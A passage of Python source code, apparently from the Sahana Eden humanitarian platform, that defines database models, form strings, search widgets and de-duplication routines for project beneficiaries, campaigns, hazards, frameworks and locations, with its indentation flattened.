msg_record_created = T("Beneficiary Type Added"),
msg_record_modified = T("Beneficiary Type Updated"),
msg_record_deleted = T("Beneficiary Type Deleted"),
msg_list_empty = T("No Beneficiary Types Found")
)
# Resource Configuration
configure(tablename,
super_entity = "stats_parameter",
)
# ---------------------------------------------------------------------
# Project Beneficiary
#
# @ToDo: Split project_id & project_location_id to separate Link Tables
#
tablename = "project_beneficiary"
table = define_table(tablename,
# Link Fields
# populated automatically
self.project_project_id(readable=False,
writable=False),
self.project_location_id(comment=None),
# Instance
super_link("data_id", "stats_data"),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("parameter_id", "stats_parameter",
label = T("Beneficiary Type"),
instance_types = ["project_beneficiary_type"],
represent = S3Represent(lookup="stats_parameter",
translate=True,
),
readable = True,
writable = True,
empty = False,
comment = S3AddResourceLink(c="project",
f="beneficiary_type",
vars = dict(child = "parameter_id"),
title=ADD_BNF_TYPE,
tooltip=T("Please record Beneficiary according to the reporting needs of your project")),
),
# Populated automatically from project_location
self.gis_location_id(readable = False,
writable = False),
Field("value", "integer",
label = T("Quantity"),
requires = IS_INT_IN_RANGE(0, 99999999),
represent = lambda v: \
IS_INT_AMOUNT.represent(v)
),
s3_date("date",
label = T("Start Date"),
#empty = False,
),
s3_date("end_date",
label = T("End Date"),
#empty = False,
),
#self.stats_source_id(),
s3_comments(),
*s3_meta_fields())
# Virtual fields
table.year = Field.Lazy(self.project_beneficiary_year)
# CRUD Strings
ADD_BNF = T("Add Beneficiaries")
crud_strings[tablename] = Storage(
title_create = ADD_BNF,
title_display = T("Beneficiaries Details"),
title_list = T("Beneficiaries"),
title_update = T("Edit Beneficiaries"),
title_search = T("Search Beneficiaries"),
title_report = T("Beneficiary Report"),
subtitle_create = T("Add New Beneficiaries"),
label_list_button = T("List Beneficiaries"),
label_create_button = ADD_BNF,
msg_record_created = T("Beneficiaries Added"),
msg_record_modified = T("Beneficiaries Updated"),
msg_record_deleted = T("Beneficiaries Deleted"),
msg_list_empty = T("No Beneficiaries Found")
)
# Resource Configuration
report_fields = ["project_location_id",
(T("Beneficiary Type"), "parameter_id"),
"project_id",
(T("Year"), "year"),
"project_id$hazard.name",
"project_id$theme.name",
(current.messages.COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
]
# ---------------------------------------------------------------------
def year_options():
"""
returns a dict of the options for the year virtual field
used by the search widget
orderby needed for postgres
"""
ptable = db.project_project
pbtable = db.project_beneficiary
pquery = (ptable.deleted == False)
pbquery = (pbtable.deleted == False)
pmin = ptable.start_date.min()
pbmin = pbtable.date.min()
p_start_date_min = db(pquery).select(pmin,
orderby=pmin,
limitby=(0, 1)).first()[pmin]
pb_date_min = db(pbquery).select(pbmin,
orderby=pbmin,
limitby=(0, 1)).first()[pbmin]
if p_start_date_min and pb_date_min:
start_year = min(p_start_date_min,
pb_date_min).year
else:
start_year = (p_start_date_min and p_start_date_min.year) or \
(pb_date_min and pb_date_min.year)
pmax = ptable.end_date.max()
pbmax = pbtable.end_date.max()
p_end_date_max = db(pquery).select(pmax,
orderby=pmax,
limitby=(0, 1)).first()[pmax]
pb_end_date_max = db(pbquery).select(pbmax,
orderby=pbmax,
limitby=(0, 1)).first()[pbmax]
if p_end_date_max and pb_end_date_max:
end_year = max(p_end_date_max,
pb_end_date_max).year
else:
end_year = (p_end_date_max and p_end_date_max.year) or \
(pb_end_date_max and pb_end_date_max.year)
if not start_year or not end_year:
return {start_year:start_year} or {end_year:end_year}
years = {}
for year in xrange(start_year, end_year + 1):
years[year] = year
return years
configure(tablename,
super_entity = "stats_data",
onaccept=self.project_beneficiary_onaccept,
deduplicate=self.project_beneficiary_deduplicate,
report_options=Storage(
search=[
S3SearchOptionsWidget(
field="project_id",
name="project",
label=T("Project")
),
S3SearchOptionsWidget(
field="parameter_id",
name="parameter_id",
label=T("Beneficiary Type")
),
# @ToDo: These do no work - no results are returned
S3SearchOptionsWidget(
field="year",
name="year",
label=T("Year"),
options = year_options
),
S3SearchOptionsWidget(
name = "beneficiary_search_L1",
field = "location_id$L1",
location_level = "L1",
cols = 3,
),
],
rows=report_fields,
cols=report_fields,
fact=["value"],
methods=["sum"],
defaults=Storage(rows="beneficiary.project_id",
cols="beneficiary.parameter_id",
fact="beneficiary.value",
aggregate="sum",
totals=True
)
),
extra_fields = ["project_id", "date", "end_date"]
)
# Reusable Field
beneficiary_id = S3ReusableField("beneficiary_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_beneficiary.id",
self.project_beneficiary_represent,
sort=True)),
represent = self.project_beneficiary_represent,
label = T("Beneficiaries"),
comment = S3AddResourceLink(c="project",
f="beneficiary",
title=ADD_BNF,
tooltip=\
T("If you don't see the beneficiary in the list, you can add a new one by clicking link 'Add Beneficiary'.")),
ondelete = "SET NULL")
# ---------------------------------------------------------------------
# Beneficiary <> Activity Link Table
#
tablename = "project_beneficiary_activity"
table = define_table(tablename,
self.project_activity_id(),
beneficiary_id(),
#s3_comments(),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_beneficiary_represent(id, row=None):
"""
FK representation
@ToDo: Bulk
"""
if row:
return row.type
if not id:
return current.messages["NONE"]
db = current.db
table = db.project_beneficiary
ttable = db.project_beneficiary_type
query = (table.id == id) & \
(table.parameter_id == ttable.id)
r = db(query).select(table.value,
ttable.name,
limitby = (0, 1)).first()
try:
return "%s %s" % (r["project_beneficiary.value"],
r["project_beneficiary_type.name"])
except:
return current.messages.UNKNOWN_OPT
# ---------------------------------------------------------------------
@staticmethod
def project_beneficiary_onaccept(form):
"""
Update project_beneficiary project & location from project_location_id
"""
db = current.db
btable = db.project_beneficiary
ltable = db.project_location
record_id = form.vars.id
query = (btable.id == record_id) & \
(ltable.id == btable.project_location_id)
project_location = db(query).select(ltable.project_id,
ltable.location_id,
limitby=(0, 1)).first()
if project_location:
db(btable.id == record_id).update(
project_id = project_location.project_id,
location_id = project_location.location_id
)
return
# ---------------------------------------------------------------------
@staticmethod
def project_beneficiary_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_beneficiary":
return
data = item.data
if "parameter_id" in data and \
"project_location_id" in data:
# Match beneficiary by type and project_location
table = item.table
parameter_id = data.parameter_id
project_location_id = data.project_location_id
query = (table.parameter_id == parameter_id) & \
(table.project_location_id == project_location_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# ---------------------------------------------------------------------
@staticmethod
def project_beneficiary_year(row):
""" Virtual field for the project_beneficiary table """
if hasattr(row, "project_beneficiary"):
row = row.project_beneficiary
try:
project_id = row.project_id
except AttributeError:
return []
try:
date = row.date
except AttributeError:
date = None
try:
end_date = row.end_date
except AttributeError:
end_date = None
if not date or not end_date:
table = current.s3db.project_project
project = current.db(table.id == project_id) \
.select(table.start_date,
table.end_date,
limitby=(0, 1)).first()
if project:
if not date:
date = project.start_date
if not end_date:
end_date = project.end_date
if not date and not end_date:
return []
elif not end_date:
return [date.year]
elif not date:
return [end_date.year]
else:
return list(xrange(date.year, end_date.year + 1))
# =============================================================================
class S3ProjectCampaignModel(S3Model):
"""
Project Campaign Model
- used for TERA integration:
http://www.ifrc.org/en/what-we-do/beneficiary-communications/tera/
- depends on Stats module
"""
names = ["project_campaign",
"project_campaign_message",
"project_campaign_keyword",
#"project_campaign_response",
"project_campaign_response_summary",
]
def model(self):
if not current.deployment_settings.has_module("stats"):
# Campaigns Model needs Stats module enabling
return dict()
T = current.T
db = current.db
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
super_link = self.super_link
location_id = self.gis_location_id
# ---------------------------------------------------------------------
# Project Campaign
#
tablename = "project_campaign"
table = define_table(tablename,
#self.project_project_id(),
Field("name", length=128, #unique=True,
#requires = IS_NOT_IN_DB(db,
# "project_campaign.name")
),
s3_comments("description",
label = T("Description")),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN = T("Add Campaign")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN,
title_display = T("Campaign"),
title_list = T("Campaigns"),
title_update = T("Edit Campaign"),
title_search = T("Search Campaigns"),
subtitle_create = T("Add New Campaign"),
label_list_button = T("List Campaigns"),
label_create_button = ADD_CAMPAIGN,
msg_record_created = T("Campaign Added"),
msg_record_modified = T("Campaign Updated"),
msg_record_deleted = T("Campaign Deleted"),
msg_list_empty = T("No Campaigns Found")
)
# Reusable Field
represent = S3Represent(lookup=tablename)
campaign_id = S3ReusableField("campaign_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_campaign.id",
represent,
sort=True)),
represent = represent,
label = T("Campaign"),
comment = S3AddResourceLink(c="project",
f="campaign",
title=ADD_CAMPAIGN,
tooltip=\
T("If you don't see the campaign in the list, you can add a new one by clicking link 'Add Campaign'.")),
ondelete = "CASCADE")
add_component("project_campaign_message",
project_campaign="campaign_id")
# ---------------------------------------------------------------------
# Project Campaign Message
# - a Message to broadcast to a geographic location (Polygon)
#
tablename = "project_campaign_message"
table = define_table(tablename,
campaign_id(),
Field("name", length=128, #unique=True,
#requires = IS_NOT_IN_DB(db,
# "project_campaign.name")
),
s3_comments("message",
label = T("Message")),
location_id(
widget = S3LocationSelectorWidget(
catalog_layers=True,
polygon=True
)
),
# @ToDo: Allow selection of which channel message should be sent out on
#self.msg_channel_id(),
# @ToDo: Record the Message sent out
#self.msg_message_id(),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN = T("Add Campaign")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN,
title_display = T("Campaign"),
title_list = T("Campaigns"),
title_update = T("Edit Campaign"),
title_search = T("Search Campaigns"),
subtitle_create = T("Add New Campaign"),
label_list_button = T("List Campaigns"),
label_create_button = ADD_CAMPAIGN,
msg_record_created = T("Campaign Added"),
msg_record_modified = T("Campaign Updated"),
msg_record_deleted = T("Campaign Deleted"),
msg_list_empty = T("No Campaigns Found")
)
# Reusable Field
represent = S3Represent(lookup=tablename)
message_id = S3ReusableField("campaign_message_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_campaign_message.id",
represent,
sort=True)),
represent = represent,
label = T("Campaign Message"),
ondelete = "CASCADE")
#add_component("project_campaign_response",
# project_campaign_message="campaign_message_id")
add_component("project_campaign_response_summary",
project_campaign_message="campaign_message_id")
# ---------------------------------------------------------------------
# Project Campaign Keyword
# - keywords in responses which are used in Stats reporting
#
tablename = "project_campaign_keyword"
table = define_table(tablename,
super_link("parameter_id", "stats_parameter"),
Field("name", length=128, unique=True,
requires = IS_NOT_IN_DB(db,
"project_campaign_keyword.name")),
s3_comments("description",
label = T("Description")),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN_KW = T("Add Keyword")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN_KW,
title_display = T("Keyword"),
title_list = T("Keywords"),
title_update = T("Edit Keyword"),
title_search = T("Search Keywords"),
subtitle_create = T("Add New Keyword"),
label_list_button = T("List Keywords"),
label_create_button = ADD_CAMPAIGN_KW,
msg_record_created = T("Keyword Added"),
msg_record_modified = T("Keyword Updated"),
msg_record_deleted = T("Keyword Deleted"),
msg_list_empty = T("No Keywords Found")
)
# Resource Configuration
configure(tablename,
super_entity = "stats_parameter",
)
# ---------------------------------------------------------------------
# Project Campaign Response
# - individual response (unused for TERA)
# - this can be populated by parsing raw responses
# - these are aggregated into project_campaign_response_summary
#
#tablename = "project_campaign_response"
#table = define_table(tablename,
# message_id(),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
# super_link("parameter_id", "stats_parameter",
# label = T("Keyword"),
# instance_types = ["project_campaign_keyword"],
# represent = S3Represent(lookup="stats_parameter"),
# readable = True,
# writable = True,
# empty = False,
# ),
# Getting this without TERA may be hard!
#location_id(writable = False),
# @ToDo: Link to the raw Message received
#self.msg_message_id(),
# s3_datetime(),
# s3_comments(),
# *s3_meta_fields())
# CRUD Strings
#ADD_CAMPAIGN_RESP = T("Add Response")
#crud_strings[tablename] = Storage(
# title_create = ADD_CAMPAIGN_RESP,
# title_display = T("Response Details"),
# title_list = T("Responses"),
# title_update = T("Edit Response"),
# title_search = T("Search Responses"),
# title_report = T("Response Report"),
# subtitle_create = T("Add New Response"),
# label_list_button = T("List Responses"),
# label_create_button = ADD_CAMPAIGN_RESP,
# msg_record_created = T("Response Added"),
# msg_record_modified = T("Response Updated"),
# msg_record_deleted = T("Response Deleted"),
# msg_list_empty = T("No Responses Found")
#)
# ---------------------------------------------------------------------
# Project Campaign Response Summary
# - aggregated responses (by Keyword/Location)
# - TERA data comes in here
#
tablename = "project_campaign_response_summary"
table = define_table(tablename,
message_id(),
# Instance
super_link("data_id", "stats_data"),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("parameter_id", "stats_parameter",
label = T("Keyword"),
instance_types = ["project_campaign_keyword"],
represent = S3Represent(lookup="stats_parameter"),
readable = True,
writable = True,
empty = False,
),
# Populated automatically (by TERA)
# & will be a msg_basestation?
location_id(writable = False),
Field("value", "integer",
label = T("Number of Responses"),
requires = IS_INT_IN_RANGE(0, 99999999),
represent = lambda v: \
IS_INT_AMOUNT.represent(v)),
# @ToDo: Populate automatically from time Message is sent?
s3_date("date",
label = T("Start Date"),
#empty = False,
),
s3_date("end_date",
label = T("End Date"),
#empty = False,
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_CAMPAIGN_RESP_SUMM = T("Add Response Summary")
crud_strings[tablename] = Storage(
title_create = ADD_CAMPAIGN_RESP_SUMM,
title_display = T("Response Summary Details"),
title_list = T("Response Summaries"),
title_update = T("Edit Response Summary"),
title_search = T("Search Response Summaries"),
title_report = T("Response Summary Report"),
subtitle_create = T("Add New Response Summary"),
label_list_button = T("List Response Summaries"),
label_create_button = ADD_CAMPAIGN_RESP_SUMM,
msg_record_created = T("Response Summary Added"),
msg_record_modified = T("Response Summary Updated"),
msg_record_deleted = T("Response Summary Deleted"),
msg_list_empty = T("No Response Summaries Found")
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectFrameworkModel(S3Model):
"""
Project Framework Model
"""
names = ["project_framework",
"project_framework_organisation",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
messages = current.messages
ORGANISATION = messages.ORGANISATION
ORGANISATIONS = T("Organization(s)")
# ---------------------------------------------------------------------
# Project Frameworks
#
tablename = "project_framework"
table = define_table(tablename,
self.super_link("doc_id", "doc_entity"),
Field("name",
length=255,
unique=True,
label = T("Name"),
),
s3_comments("description",
label = T("Description"),
comment=None,
),
Field("time_frame",
represent = lambda v: v or messages.NONE,
label = T("Time Frame"),
),
*s3_meta_fields())
# CRUD Strings
if current.deployment_settings.get_auth_record_approval():
msg_record_created = T("Policy or Strategy added, awaiting administrator's approval")
else:
msg_record_created = T("Policy or Strategy added")
crud_strings[tablename] = Storage(
title_create = T("Add Policy or Strategy"),
title_display = T("Policy or Strategy"),
title_list = T("Policies & Strategies"),
title_update = T("Edit Policy or Strategy"),
title_search = T("Search Policies & Strategies"),
title_upload = T("Import Policies & Strategies"),
subtitle_create = T("Add New Policy or Strategy"),
label_list_button = T("List Policies & Strategies"),
label_create_button = T("Add Policy or Strategy"),
msg_record_created = msg_record_created,
msg_record_modified = T("Policy or Strategy updated"),
msg_record_deleted = T("Policy or Strategy deleted"),
msg_list_empty = T("No Policies or Strategies found")
)
crud_form = S3SQLCustomForm(
"name",
S3SQLInlineComponent(
"framework_organisation",
label = ORGANISATIONS,
fields = ["organisation_id"],
),
"description",
"time_frame",
S3SQLInlineComponent(
"document",
label = T("Files"),
fields = ["file"],
filterby = dict(field = "file",
options = "",
invert = True,
)
),
)
# search_method = S3Search(simple = S3SearchSimpleWidget(
# name = "project_framework_search_text",
# label = T("Name"),
# comment = T("Search for a Policy or Strategy by name or description."),
# field = ["name",
# "description",
# ]
# ))
self.configure(tablename,
super_entity="doc_entity",
crud_form = crud_form,
#search_method = search_method,
list_fields = ["name",
(ORGANISATIONS, "framework_organisation.organisation_id"),
"description",
"time_frame",
(T("Files"), "document.file"),
]
)
represent = S3Represent(lookup=tablename)
framework_id = S3ReusableField("framework_id", table,
label = ORGANISATION,
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_framework.id",
represent
)),
represent = represent,
ondelete = "CASCADE",
)
self.add_component("project_framework_organisation",
project_framework="framework_id")
# ---------------------------------------------------------------------
# Project Framework Organisations
#
tablename = "project_framework_organisation"
define_table(tablename,
framework_id(),
self.org_organisation_id(),
*s3_meta_fields()
)
# CRUD Strings
crud_strings[tablename] = Storage(
title_create = T("New Organization"),
title_display = ORGANISATION,
title_list = T("Organizations"),
title_update = T("Edit Organization"),
title_search = T("Search Organizations"),
subtitle_create = T("Add New Organization"),
label_list_button = T("List Organizations"),
label_create_button = T("Add Organization"),
msg_record_created = T("Organization added to Policy/Strategy"),
msg_record_modified = T("Organization updated"),
msg_record_deleted = T("Organization removed from Policy/Strategy"),
msg_list_empty = T("No Organizations found for this Policy/Strategy")
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectHazardModel(S3Model):
"""
Project Hazard Model
"""
names = ["project_hazard",
"project_hazard_project",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
NONE = current.messages["NONE"]
# ---------------------------------------------------------------------
# Hazard
#
tablename = "project_hazard"
table = define_table(tablename,
Field("name",
length=128,
notnull=True,
unique=True,
label=T("Name"),
represent=lambda v: T(v) if v is not None \
else NONE,
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_HAZARD = T("Add Hazard")
crud_strings[tablename] = Storage(
title_create = ADD_HAZARD,
title_display = T("Hazard Details"),
title_list = T("Hazards"),
title_update = T("Edit Hazard"),
title_upload = T("Import Hazards"),
subtitle_create = T("Add New Hazard"),
label_list_button = T("List Hazards"),
label_create_button = ADD_HAZARD,
label_delete_button = T("Delete Hazard"),
msg_record_created = T("Hazard added"),
msg_record_modified = T("Hazard updated"),
msg_record_deleted = T("Hazard deleted"),
msg_list_empty = T("No Hazards currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename, translate=True)
hazard_id = S3ReusableField("hazard_id", table,
sortby = "name",
label = T("Hazards"),
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_hazard.id",
represent,
sort=True)),
represent = represent,
ondelete = "CASCADE",
)
# Field settings for project_project.hazard field in friendly_string_from_field_query function
# - breaks Action Buttons, so moved to inside the fn which calls them
#table.id.represent = represent
#table.id.label = T("Hazard")
# ---------------------------------------------------------------------
# Projects <> Hazards Link Table
#
tablename = "project_hazard_project"
define_table(tablename,
hazard_id(),
self.project_project_id(),
*s3_meta_fields()
)
# CRUD Strings
crud_strings[tablename] = Storage(
title_create = T("New Hazard"),
title_display = T("Hazard"),
title_list = T("Hazards"),
title_update = T("Edit Hazard"),
title_search = T("Search Hazards"),
title_upload = T("Import Hazard data"),
subtitle_create = T("Add New Hazard"),
label_list_button = T("List Hazards"),
label_create_button = T("Add Hazard to Project"),
msg_record_created = T("Hazard added to Project"),
msg_record_modified = T("Hazard updated"),
msg_record_deleted = T("Hazard removed from Project"),
msg_list_empty = T("No Hazards found for this Project"))
self.configure(tablename,
deduplicate=self.project_hazard_project_deduplicate,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_project_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_hazard_project":
return
data = item.data
if "project_id" in data and \
"hazard_id" in data:
project_id = data.project_id
hazard_id = data.hazard_id
table = item.table
query = (table.project_id == project_id) & \
(table.hazard_id == hazard_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectLocationModel(S3Model):
"""
Project Location Model
- these can simply be ways to display a Project on the Map
or these can be 'Communities'
"""
names = ["project_location",
"project_location_id",
"project_location_contact",
"project_location_represent",
]
def model(self):
T = current.T
db = current.db
settings = current.deployment_settings
community = settings.get_project_community()
messages = current.messages
NONE = messages["NONE"]
COUNTRY = messages.COUNTRY
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# Project Location ('Community')
#
tablename = "project_location"
table = define_table(tablename,
self.super_link("doc_id", "doc_entity"),
# Populated onaccept - used for map popups
Field("name",
writable=False),
self.project_project_id(),
self.gis_location_id(
widget = S3LocationAutocompleteWidget(),
requires = IS_LOCATION(),
represent = self.gis_LocationRepresent(sep=", "),
comment = S3AddResourceLink(c="gis",
f="location",
label = T("Add Location"),
title=T("Location"),
tooltip=T("Enter some characters to bring up a list of possible matches")),
),
# % breakdown by location
Field("percentage", "decimal(3,2)",
label = T("Percentage"),
default = 0,
requires = IS_DECIMAL_IN_RANGE(0, 1),
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
if community:
LOCATION = T("Community")
LOCATION_TOOLTIP = T("If you don't see the community in the list, you can add a new one by clicking link 'Add Community'.")
ADD_LOCATION = T("Add Community")
crud_strings[tablename] = Storage(
title_create = ADD_LOCATION,
title_display = T("Community Details"),
title_list = T("Communities"),
title_update = T("Edit Community Details"),
title_search = T("Search Communities"),
title_upload = T("Import Community Data"),
title_report = T("3W Report"),
title_map = T("Map of Communities"),
subtitle_create = T("Add New Community"),
label_list_button = T("List Communities"),
label_create_button = ADD_LOCATION,
msg_record_created = T("Community Added"),
msg_record_modified = T("Community Updated"),
msg_record_deleted = T("Community Deleted"),
msg_list_empty = T("No Communities Found")
)
else:
LOCATION = T("Location")
LOCATION_TOOLTIP = T("If you don't see the location in the list, you can add a new one by clicking link 'Add Location'.")
ADD_LOCATION = T("Add Location")
crud_strings[tablename] = Storage(
title_create = ADD_LOCATION,
title_display = T("Location Details"),
title_list = T("Locations"),
title_update = T("Edit Location Details"),
title_search = T("Search Location"),
title_upload = T("Import Location Data"),
title_report = T("3W Report"),
title_map = T("Map of Projects"),
subtitle_create = T("Add New Location"),
label_list_button = T("List Locations"),
label_create_button = ADD_LOCATION,
msg_record_created = T("Location Added"),
msg_record_modified = T("Location updated"),
msg_record_deleted = T("Location Deleted"),
msg_list_empty = T("No Locations Found")
)
# Search Method
if community:
simple = S3SearchSimpleWidget(
name = "project_location_search_text",
label = T("Name"),
comment = T("Search for a Project Community by name."),
field = ["location_id$L0",
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
#"location_id$L5",
]
)
else:
simple = S3SearchSimpleWidget(
name = "project_location_search_text",
label = T("Text"),
comment = T("Search for a Project by name, code, location, or description."),
field = ["location_id$L0",
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
#"location_id$L5",
"project_id$name",
"project_id$code",
"project_id$description",
]
)
advanced_search = [
simple,
# This is only suitable for deployments with a few projects
#S3SearchOptionsWidget(
# name = "project_location_search_project",
# label = T("Project"),
# field = "project_id",
# cols = 3
#),
S3SearchOptionsWidget(
name = "project_location_search_theme",
label = T("Theme"),
field = "project_id$theme_project.theme_id",
options = self.project_theme_opts,
cols = 1,
),
S3SearchOptionsWidget(
name = "project_location_search_L0",
field = "location_id$L0",
label = COUNTRY,
cols = 3
),
S3SearchOptionsWidget(
name = "project_location_search_L1",
field = "location_id$L1",
location_level = "L1",
cols = 3
),
S3SearchOptionsWidget(
name = "project_location_search_L2",
field = "location_id$L2",
location_level = "L2",
cols = 3
),
S3SearchOptionsWidget(
name = "project_location_search_L3",
field = "location_id$L3",
location_level = "L3",
cols = 3
)
]
if settings.get_project_sectors():
sectors = S3SearchOptionsWidget(
name = "project_location_search_sector",
label = T("Sector"),
field = "project_id$sector.name",
cols = 3
)
advanced_search.insert(1, sectors)
search_method = S3Search(
simple = (simple),
advanced = advanced_search,
)
# Resource Configuration
report_fields = [(COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
(messages.ORGANISATION, "project_id$organisation_id"),
(T("Project"), "project_id"),
(T("Activity Types"), "activity_type.activity_type_id"),
]
list_fields = ["location_id",
(COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
"project_id",
]
if settings.get_project_theme_percentages():
list_fields.append((T("Themes"), "project_id$theme_project.theme_id"))
else:
list_fields.append((T("Activity Types"), "activity_type.activity_type_id"))
list_fields.append("comments")
configure(tablename,
super_entity="doc_entity",
create_next=URL(c="project", f="location",
args=["[id]", "beneficiary"]),
deduplicate=self.project_location_deduplicate,
onaccept=self.project_location_onaccept,
search_method=search_method,
report_options=Storage(search = advanced_search,
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(rows="location.location_id$L1",
cols="location.project_id",
fact="activity_type.activity_type_id",
aggregate="list",
totals=True
)
),
list_fields = list_fields,
)
# Reusable Field
project_location_represent = project_LocationRepresent()
project_location_id = S3ReusableField("project_location_id", table,
requires = IS_NULL_OR(
IS_ONE_OF(db(current.auth.s3_accessible_query("update",
table)),
"project_location.id",
project_location_represent,
sort=True)),
represent = project_location_represent,
label = LOCATION,
comment = S3AddResourceLink(ADD_LOCATION,
c="project", f="location",
tooltip=LOCATION_TOOLTIP),
ondelete = "CASCADE"
)
# Components
# Activity Types
add_component("project_activity_type",
project_location=dict(
link="project_activity_type_location",
joinby="project_location_id",
key="activity_type_id",
actuate="hide"))
# Beneficiaries
add_component("project_beneficiary",
project_location="project_location_id")
# Contacts
add_component("pr_person",
project_location=dict(
name="contact",
link="project_location_contact",
joinby="project_location_id",
key="person_id",
actuate="hide",
autodelete=False))
# Distributions
add_component("supply_distribution",
project_location="project_location_id")
# Themes
add_component("project_theme",
project_location=dict(
link="project_theme_location",
joinby="project_location_id",
key="theme_id",
actuate="hide"))
# ---------------------------------------------------------------------
# Project Community Contact Person
#
tablename = "project_location_contact"
table = define_table(tablename,
project_location_id(),
self.pr_person_id(
widget=S3AddPersonWidget(controller="pr"),
requires=IS_ADD_PERSON_WIDGET(),
comment=None
),
*s3_meta_fields())
# CRUD Strings
ADD_CONTACT = T("Add Contact")
LIST_OF_CONTACTS = T("Community Contacts")
crud_strings[tablename] = Storage(
title_create = ADD_CONTACT,
title_display = T("Contact Details"),
title_list = T("Contacts"),
title_update = T("Edit Contact Details"),
title_search = T("Search Contacts"),
subtitle_create = T("Add New Contact"),
label_list_button = T("List Contacts"),
label_create_button = ADD_CONTACT,
msg_record_created = T("Contact Added"),
msg_record_modified = T("Contact Updated"),
msg_record_deleted = T("Contact Deleted"),
msg_list_empty = T("No Contacts Found"))
# Components
# Email
add_component("pr_contact",
project_location_contact=dict(
name="email",
link="pr_person",
joinby="id",
key="pe_id",
fkey="pe_id",
pkey="person_id",
filterby="contact_method",
filterfor=["EMAIL"],
))
# Mobile Phone
add_component("pr_contact",
project_location_contact=dict(
name="phone",
link="pr_person",
joinby="id",
key="pe_id",
fkey="pe_id",
pkey="person_id",
filterby="contact_method",
filterfor=["SMS"],
))
contact_search_method = S3Search(
advanced=(S3SearchSimpleWidget(
name = "location_contact_search_simple",
label = T("Name"),
comment = T("You can search by person name - enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons."),
field = ["person_id$first_name",
"person_id$middle_name",
"person_id$last_name"
]
),
S3SearchOptionsWidget(
name="location_contact_search_L1",
field="project_location_id$location_id$L1",
location_level="L1",
cols = 3,
),
S3SearchOptionsWidget(
name="location_contact_search_L2",
field="project_location_id$location_id$L2",
location_level="L2",
cols = 3,
)
))
# Resource configuration
configure(tablename,
search_method=contact_search_method,
list_fields=["person_id",
(T("Email"), "email.value"),
(T("Mobile Phone"), "phone.value"),
"project_location_id",
(T("Project"), "project_location_id$project_id"),
])
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(project_location_id = project_location_id,
project_location_represent = project_location_represent,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_location_id = lambda **attr: dummy("project_location_id"),
)
# -------------------------------------------------------------------------
@staticmethod
def project_location_onaccept(form):
"""
Calculate the 'name' field used by Map popups
"""
vars = form.vars
id = vars.id
if vars.location_id and vars.project_id:
name = current.s3db.project_location_represent(None, vars)
elif id:
name = current.s3db.project_location_represent(id)
else:
return None
if len(name) > 512:
# Ensure we don't break limits of SQL field
name = name[:509] + "..."
db = current.db
db(db.project_location.id == id).update(name=name)
# -------------------------------------------------------------------------
@staticmethod
def project_location_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_location":
return
data = item.data
if "project_id" in data and \
"location_id" in data:
project_id = data.project_id
location_id = data.location_id
table = item.table
query = (table.project_id == project_id) & \
(table.location_id == location_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectOrganisationModel(S3Model):
"""
Project Organisation Model
"""
names = ["project_organisation"]
def model(self):
T = current.T
messages = current.messages
NONE = messages["NONE"]
# ---------------------------------------------------------------------
# Project Organisations
# for multi_orgs=True
#
project_organisation_roles = current.deployment_settings.get_project_organisation_roles()
organisation_help = T("Add all organizations which are involved in different roles in this project")
tablename = "project_organisation"
table = self.define_table(tablename,
self.project_project_id(),
self.org_organisation_id(
requires = self.org_organisation_requires(
required=True,
# Need to be able to add Partners/Donors not just Lead org
#updateable=True,
),
widget = None,
